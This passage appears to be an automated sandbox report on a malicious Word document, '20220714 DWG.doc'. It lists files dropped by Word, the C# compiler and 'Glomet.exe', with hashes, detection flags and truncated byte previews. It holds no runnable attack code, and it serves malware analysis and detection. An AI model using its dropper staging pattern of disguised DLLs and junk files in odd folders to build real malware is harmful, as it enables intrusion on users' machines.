                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.0.v.y.i.o.h.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...q.0.v.y.i.o.h.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5120
                                                                                                                                                                            Entropy (8bit):3.78135442988181
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:63oPhmKraYZkH8KTibUyyjkwjj0JzC+CFSlwY6c1ul6a3eq:JDaAkHHoYjk8CCuW8K
                                                                                                                                                                            MD5:B1041526E4D7DF76C7051D790B5AFC68
                                                                                                                                                                            SHA1:E36DEF95C69EC15279ACB38C4928056778BECCD4
                                                                                                                                                                            SHA-256:F2CB1738D6DC5AA4ED860A5F14C7A15F29DFDD094C6E5180FCEA7AF62572A4F0
                                                                                                                                                                            SHA-512:61E5C811C8E868DEA18377D02C92F7A0229DAF95BCE9B9915770544427C69C02E5E0DD7D2001A1557FAA7AF5F36C07F84BDFF3DA4983479A9F6CB1EF449A3429
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....

                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\20220714 DWG.doc.LNK

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:53 2022, mtime=Fri Jul 15 21:26:43 2022, atime=Fri Jul 15 21:26:30 2022, length=952586, window=hide
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1065
                                                                                                                                                                            Entropy (8bit):4.707778520835495
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:8IpNXO+yx6ntEiKfqGWAkZGiDReDmeP7aB6m:8AOpetEi7gkZgDruB6
                                                                                                                                                                            MD5:1A992CB18EE8315E59FE72647A811A51
                                                                                                                                                                            SHA1:57F0641E2DC996B9BF41A0A7058688F41751C920
                                                                                                                                                                            SHA-256:DBFEFDC07E8D4AA4CA5516C534EE2260974783CCC46E5C8C90A9ACA441607BDC
                                                                                                                                                                            SHA-512:FBD6C154C2EC7B3C3656FE002D94B093229DD73E37EAEF5B419242615D91666CE6304EA5F3884F5ACDABB4185823815CF20DB2785DF7323AEC6EF5EABEF1C83A
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Preview:L..................F.... ........3...".........................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...TG.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..TG......S......................#.h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..TG......Y..............>......r.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2......TP. .202207~1.DOC..R......hT...TP.....h.....................jX..2.0.2.2.0.7.1.4. .D.W.G...d.o.c.......V...............-.......U...........>.S......C:\Users\user\Desktop\20220714 DWG.doc..'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.2.0.2.2.0.7.1.4. .D.W.G...d.o.c.........:..,.LB.)...As...`.......X.......445817...........!a..%.H.VZAj................-..!a..%.H.VZAj................-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........

                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):83
                                                                                                                                                                            Entropy (8bit):4.730226107310523
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:bDuMJlHnXAGCmX1XfnXAGCv:bCuxFxs
                                                                                                                                                                            MD5:30ED0BEF715E14C5F6D66C801E22F60D
                                                                                                                                                                            SHA1:3F6C93D092BEE372865A225B70A24C64FB15AD96
                                                                                                                                                                            SHA-256:933CA4C6D92C549C547026A1EE3345C621E25B6A494B5C8314B5A317F62A1CDC
                                                                                                                                                                            SHA-512:040E1518A7881B39A7C7CBE98968A9D392B2C5A8F037B4C8FB036C79878B1767DBB8E84F601D9731A5CEBEBE3EE1F40699DAB3D7FFE81E01EB489ACA99E30414
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[folders]..Templates.LNK=0..20220714 DWG.doc.LNK=0..[doc]..20220714 DWG.doc.LNK=0..

                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                            Entropy (8bit):2.3757142142596672
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Rl/ZdDYi09Ml/tGc5BlqKamIlp3///r:RtZBYi0ul/RQEEz
                                                                                                                                                                            MD5:2043315C43FD0AE4F95D73D0BFFEB0C9
                                                                                                                                                                            SHA1:76C9954C570AE8713FD58BAA6E84B5D838952EAE
                                                                                                                                                                            SHA-256:A6102FC69A9E9C359AB3D4BCA82036F0A91879577B5D4AAF2008B650E579484D
                                                                                                                                                                            SHA-512:993914D9A9F7B435A839E6AAFE267B7EA587EA751D6200FA9DD09F17C5AC1095E4A9BC7937E57955C02BB28703F434C820C90165A15AB6B5FD89662ACAF36E22
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.pratesh................................................p.r.a.t.e.s.h.........w}...........!..........).......{}..............H.......6C.......}..................

                                                                                                                                                                            C:\Users\user\Desktop\~$220714 DWG.doc

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                            Entropy (8bit):2.3663946154675255
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Rl/ZdDYiVPVlsltGc5BlqKamIlp3///r:RtZBYiSRQEEz
                                                                                                                                                                            MD5:BDADF5ADED5B1978644D4A41EF76B610
                                                                                                                                                                            SHA1:F2086E77EFFE92A36572737F03AF1CEC30FDBDEB
                                                                                                                                                                            SHA-256:BAC06C12955D68FC191286DBC17A48E5ACC3FB99494AD0A691959AC64EB95072
                                                                                                                                                                            SHA-512:FA857E727399D68E0092485E0DF9BE114A61706A8E8FBFD51A2D65FE2A1BB9AE1862210B8FA88FCC8F4E7180CA80289FC1F36168FAD0D7EC6110228D357546C2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.pratesh................................................p.r.a.t.e.s.h.........w}..........h.j.0...&...).......{}..............H.......6C.......}..................

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Adventure_7.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):10047
                                                                                                                                                                            Entropy (8bit):7.907326378703077
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:oXRaW9Fx3fNTzZJb0EXG/E5ziOld0GZen6gVCNYlaqeTpq3RSHzmEZjcGK09vJ2R:KRbFx9wEXIE5GOleGZeoWvelq+zmEll4
                                                                                                                                                                            MD5:CB3AC474E2A0B2000C9FA1C77302A819
                                                                                                                                                                            SHA1:98AC5372A0747F091D725ADEEA8B3B75B635B943
                                                                                                                                                                            SHA-256:281E55D419499196EC9848E3CCED72A3F7A5E86FA7402F4EB970962C47FAB090
                                                                                                                                                                            SHA-512:3A32310A064E7F718E95A861A5903BF9D83C0E98F550E731871FDA6F16CAF5410D17D2F7766303DFB114BE1443A246D0949E79C98C6C8639E7A54E37B34D5383
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF.....d.d.....:Exif..MM.*......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......*....>....S.J......t......"..]..w..is...g..R.27....!..p.r.......^..V.4Q.Iq7.........E...W...h.2..i!.&...R._6............&|....!...W.._....'.}.M...........X.#...I.7.}.Q$...1..l.a..`..'.....,|..S.^k.&;/.i?.b..Jh.d.;...I...6.P#lH....c....{..6.'..kP.P./n......\(..%..L....|...w..d.D....o.k..[.....<3

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\BLINDERS.PAR

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):121302
                                                                                                                                                                            Entropy (8bit):7.027796741277164
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:u8H3kQe/WmaSGweq0e/r5e54MXw2oM+uZCqpaH:Z3kl2SaeoLw2o3Yp6
                                                                                                                                                                            MD5:11025BC5B46BDF5F72FFA2E5291BC3A2
                                                                                                                                                                            SHA1:EE04A8B3B1FD1351F3BC0233E57C896A0D1A45D8
                                                                                                                                                                            SHA-256:A5E4312E6884158B29C7A93A7583E29094472C9AEA17D9C406D0FFA10A89650F
                                                                                                                                                                            SHA-512:7684DC196B17C8524D72F73BAE3FD9A0DEFAA3955F4BB223560039C036763D8BA54223C655BFD9540FB767EFC514139CA5B737458158AB4F600D65C93B5D4A11
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.!p...B{..-j........:G..2..uD..ty>..P)..+g*8....I.t..e.E..... p";.._5.9F!.%../..l..o......cnr.....=3C...&.....[.;.......~.....g.......-I.w......n...".A1B....`.f..M.q.W..Q{.|U'...\.s....'zs.a.+O....P.Q.. .W)=.....a)J.U.....#;...~.....E..D........>...b..55Q.......N).y.0...c........Z..F.}./F..u.b.~H.D|.....PS:.B..l.9....F+..ms[.WY.V....^._.5.5|!M....Jxy}CJ3.....{....%....d........D...OW*...26.D*t1t.B.z_. ....r.......}..h.......N. ..pc@n\....6.ts{..6..w..OQiK.......V.5%T.....\>j...<[4I......t..O~x.Y.D...`^s.r....$.N ...C.#..z..!U#..h..[..L.....J.%..;.%j'.....w.?.l0.v..[.me...y..dS.,......x.`i1.m...q.....l.cH.1.....QT...#(.=k.......H.-B.....*.....Z].n....l. Yk.r..o.0V....*...vU.843.Bs{.Q.!'Hz.f.#"t.'=...^.....) ......Q...o7R...G.r.5..Z.`.gE.+......_.!.......v... (.......^o.@;..^.<.8.5.x5R..W.y...E..$.z....[i..o.Q...e]'....-..7t.(..y......ca.>......<.K.....'&D@.Ug.3B.s.Z.".B....(."2U..h[......:.....o.`y}.)...dz].+.A.`._...0.B....B..ZAt

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Fns\differentieringerne\PHOTOCOMPOSE\serpigoes\api-ms-win-core-timezone-l1-1-0.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):18696
                                                                                                                                                                            Entropy (8bit):7.1338859952744516
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:rWW1hWv4wm0GftpBjgpm3SSP9lndaYhpwe/:ReFVi02vZ
                                                                                                                                                                            MD5:C9A55DE62E53D747C5A7FDDEDEF874F9
                                                                                                                                                                            SHA1:C5C5A7A873A4D686BFE8E3DA6DC70F724CE41BAD
                                                                                                                                                                            SHA-256:B5C725BBB475B5C06CC6CB2A2C3C70008F229659F88FBA25CCD5D5C698D06A4B
                                                                                                                                                                            SHA-512:ADCA0360A1297E80A8D3C2E07F5FBC06D2848F572F551342AD4C9884E4AB4BD1D3B3D9919B4F2B929E2848C1A88A4E844DD38C86067CACE9685F9640DB100EFB
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.PE..L....}.............!......................... ...............................0......a9....@.............................E............ ...................=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@.....}..........<...T...T........}..........d................}......................RSDSfb.f.{....A...~}....api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02.....................}......................(...\...........*...f...........C...............9.......................H...........%...j...............b.....................................api-ms-win-core-timezone-l1-1-0.dll.EnumDynamicTimeZoneInforma

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\api-ms-win-crt-stdio-l1-1-0.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):24328
                                                                                                                                                                            Entropy (8bit):6.867867660778997
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:/ZpFVhHW1hWxgYBm0GftpBjMm3SNlndaYhpn3p:boEVi6DBp
                                                                                                                                                                            MD5:D5166AB3034F0E1AA679BFA1907E5844
                                                                                                                                                                            SHA1:851DD640CB34177C43B5F47B218A686C09FA6B4C
                                                                                                                                                                            SHA-256:7BCAB4CA00FB1F85FEA29DD3375F709317B984A6F3B9BA12B8CF1952F97BEEE5
                                                                                                                                                                            SHA-512:8F2D7442191DE22457C1B8402FAAD594AF2FE0C38280AAAFC876C797CA79F7F4B6860E557E37C3DBE084FE7262A85C358E3EEAF91E16855A91B7535CB0AC832E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.PE..L......G...........!.........................0...............................@............@.............................a............0..............."...=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v......................G........8...d...d..........G........d..................G....................RSDS9uG.l..k..y.........api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02...........G....^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\application-x-firmware-symbolic.symbolic.png

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):296
                                                                                                                                                                            Entropy (8bit):6.971754190015909
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:6v/lhPysVQcvxPuNDvXIqFO2Ko4SX19QbWHKBtG6Qp3VOhr8Ja3O/bp:6v/7icpPuhP9O2Ko4SXDQL6pl9au1
                                                                                                                                                                            MD5:AB7A8A94E57531D1BB8C28C2498EB5FF
                                                                                                                                                                            SHA1:32733872A8D9704C83730E6366AFE490ECA4675B
                                                                                                                                                                            SHA-256:6E551C69C5C734D33635662F491802CC42497B1CB8C55C8810331FD61E838E47
                                                                                                                                                                            SHA-512:AC6B5B3D9F77367FB0BC49D0F2F5FF50CDA00DF7DF1E953CD3253403BF29B15BD89DB6FBDF3624CC0A0D156D196AA5750364772A879022AA4A0AB895D077228E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...?J.A...~Ej.....sx.K........3X.Xx.K.b.!D....Evu..F?..0......L0..;.J&..........s.*...4p.6..0..b..5iC.X......B{/.;.c....7.Z..'.Y.Ez ........+..A%/..wX...|*._.p.._4.x.2.$.-\..#.E?..[.p...q.+<i... .-P.4..[.....:.%.".k....IEND.B`.

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\battery-level-90-charging-symbolic.svg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):6689
                                                                                                                                                                            Entropy (8bit):5.135211840989561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:VkjcMIy2+X2I2F2C2G2fH7y8cQaVB2nnuy1FQOcQaVv2q22L2k2s:mjcM7u8xaV8nnL1FQOxaVu6
                                                                                                                                                                            MD5:C96D0DD361AFC6B812BDDD390B765A26
                                                                                                                                                                            SHA1:71081F096719CAA70B9BAEF86FE642635D8E2765
                                                                                                                                                                            SHA-256:6690799E5FA3FB0DD6CCE4BAC5AA1607C8A6BB16507854A87520C7DE53052E1B
                                                                                                                                                                            SHA-512:7C73BC880A9401C64AB0571957B414180C1B94137C7BC870BA602979E7A990640A37991CB87A40BC7E5942A37FDA25EFC58C759C00F4344BA3D88B9AA64182DA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg. xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:cc="http://creativecommons.org/ns#". xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#". xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". width="16". version="1.1". style="enable-background:new". id="svg7384". height="16.000036">. <metadata. id="metadata90">. <rdf:RDF>. <cc:Work. rdf:about="">. <dc:format>image/svg+xml</dc:format>. <dc:type. rdf:resource="http://purl.org/dc/dcmitype/StillImage" />. <dc:title>Gnome Symbolic Icons</dc:title>. <cc:license. rdf:resource="http://creativecommons.org/licenses/by-sa/4.0/" />. </cc:Work>. <cc:License. rdf:about="http://creativecommons.org/licenses/by-sa/4.0/">. <cc:permits. rdf:resource="http://creativecommons.org/ns#Reproduction" />. <cc:permits. rdf:resource="htt

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1\network-vpn-acquiring-symbolic.symbolic.png

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):219
                                                                                                                                                                            Entropy (8bit):6.506614984308849
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:6v/lhPysPUiNdXNmc5MKu1+7x0INpMIyrrjp:6v/7vRNRAKuE7x0cyt
                                                                                                                                                                            MD5:F83435B787A27592C81699512B3237D1
                                                                                                                                                                            SHA1:F440598B5B859E7572713EF8D864980C0970A60B
                                                                                                                                                                            SHA-256:C5D573D809E54302DE4D14F9CE8D9487F2E3332656C2F14E3CE24DCB0A18B18B
                                                                                                                                                                            SHA-512:0D47233D9A12789DAB794C7DDD0A6F44B66548DB2CFF036F22FCA61C83D704BA47690B74F1BEDBA7D5C85C1B0220FC598CE5E1D96F8A7B61DA7A7F8FC4758B25
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8.....1.E..G"..J.. ..6..6.V......H.$..-..J......|H+..`.a...8..)f...c.6...v..(.....S.n.@?...k.z.*S.t.}.8b^..8..}.F..u.P......T.6....W..+...{. &.......IEND.B`.

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\REDO\DYSMENORRHEIC\Tidehead7\Kartonens\Green_Leaves_9.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):10408
                                                                                                                                                                            Entropy (8bit):7.906525417677416
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:oXRGoU3vTphbDt8uZJICYsi1VgBlTKBNpaWq7nnyTd/Jc9aW22vWRYf/:KRGn3HDCSzYsXBw3eELcvviYf/
                                                                                                                                                                            MD5:A0DFE28CCF8E332E0186AB6FF2CB3D11
                                                                                                                                                                            SHA1:82C095E53BA2E619387E1625C895BCBFCAEE30C3
                                                                                                                                                                            SHA-256:6E9BCA83901876A559145E7CDAEC5CCED1349B7E05B11949FC0DD04BF7F49487
                                                                                                                                                                            SHA-512:24D9FCC4D15DBB51B297E51CF34514D557A7D6C1ED36DD975B6952C85DF196DC776B727CC5811B2292A6648515B7FB4A231037363B0FED799A55001B3FBE3D62
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF.....d.d.....:Exif..MM.*......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.............mC......j....=..S....7wwW..}..7...7...s..e.....(.%.{o.O...+....3..........I...,..K5.\.^\..R....A_......j....b..?.~...s_.|(........[..6..W....;}L<..3.Ep..rTy.V^..4......_.>.x...W..$.T....x+.0\X\.."Ij.^.Q..G-.).._.X.elU...K.8..$.?k........%..\.......z.9|S...>..>(.-.a./.}.W...hl..gm.m.

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\REDO\DYSMENORRHEIC\Tidehead7\Kartonens\MsMpRes.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):11064
                                                                                                                                                                            Entropy (8bit):6.711612160200339
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:s8WNxOWVr8VHwDDBQABJ304RGV+9N8qnajQzUmeJ:JWNxOWVr6wDDBRJ304RGVhl8zUmg
                                                                                                                                                                            MD5:18A5852C6BE281D5BD78384D0A27D505
                                                                                                                                                                            SHA1:FC6E98D9F2031DF335E252DB0CCB3DB478E31DCC
                                                                                                                                                                            SHA-256:B39443D909F3D94D1322BC1C386B8E5BEAD9C49C410DD436EFC48E8125A23ABF
                                                                                                                                                                            SHA-512:AC400D0AFEAC75BC6405B9240C2FCBE319B48A8837E5266827BBA8C5B44BE21FB9A97727C39CFAD1EB06C43D14F914F61C884DF8E357EDADD126D0F175C5B0A8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d....u............" .........................................................0......`t....`.......................................................... .. ...............8!..............8............................................................................rdata..............................@..@.rsrc... .... ......................@..@.....u..........T...8...8........u..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..p....rsrc$02.... ................s..........v.u..........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\document-revert-symbolic.svg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):919
                                                                                                                                                                            Entropy (8bit):4.466221099303822
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:2dPnnxu3tlHP2/RCbrB6DlzdMBTbD1tOi96jbON:cfne3B6VuDvObbON
                                                                                                                                                                            MD5:06EDD955BC906D8ED012C8DB40164053
                                                                                                                                                                            SHA1:459E73346A099E946F6024272E32B21012DE7274
                                                                                                                                                                            SHA-256:93977AFF7AA27CFEEC1EF855F32C40DA9D175831CE34A58F967178404F29BC8D
                                                                                                                                                                            SHA-512:A00A43799197FBB9F1CC301377800BD19008C323BF03EB3DD02059182192C7975CE0441A11F118F2147F663883E8CD15668E9BB2EEBB229B99CE33A71A9E43E5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 2 0 c -0.550781 0 -1 0.449219 -1 1 v 14 c 0 0.550781 0.449219 1 1 1 h 10 v -2 h -9 v -12 h 7.585938 l 2.414062 2.414062 v 2.585938 h 2 v -3 c 0 -0.265625 -0.105469 -0.519531 -0.292969 -0.707031 l -3 -3 c -0.1875 -0.1875 -0.441406 -0.292969 -0.707031 -0.292969 z m 5 8 v 2 h 4 c 1.117188 0 2 0.882812 2 2 v 4 h 2 v -4 c 0 -2.199219 -1.800781 -4 -4 -4 z m 0 0" fill-rule="evenodd"/>. <path d="m 9 5 c -0.277344 0 -0.527344 0.113281 -0.707031 0.292969 l -3.707031 3.707031 l 3.707031 3.707031 c 0.179687 0.179688 0.429687 0.292969 0.707031 0.292969 h 1 v -1 c 0 -0.277344 -0.113281 -0.527344 -0.292969 -0.707031 l -2.292969 -2.292969 l 2.292969 -2.292969 c 0.179688 -0.179687 0.292969 -0.429687 0.292969 -0.707031 v -1 z m 0 0"/>. </g>.</svg>.

                                                                                                                                                                            C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\folder-remote-symbolic.svg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1092
                                                                                                                                                                            Entropy (8bit):5.190026674828756
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:t4CpV2rk5DtVloyKbRAecFxMGMaMOtMJPlfyIR:TtDoNtAecFJMLPlfyU
                                                                                                                                                                            MD5:A4F8EA7AC00083A482B8BAA66412235A
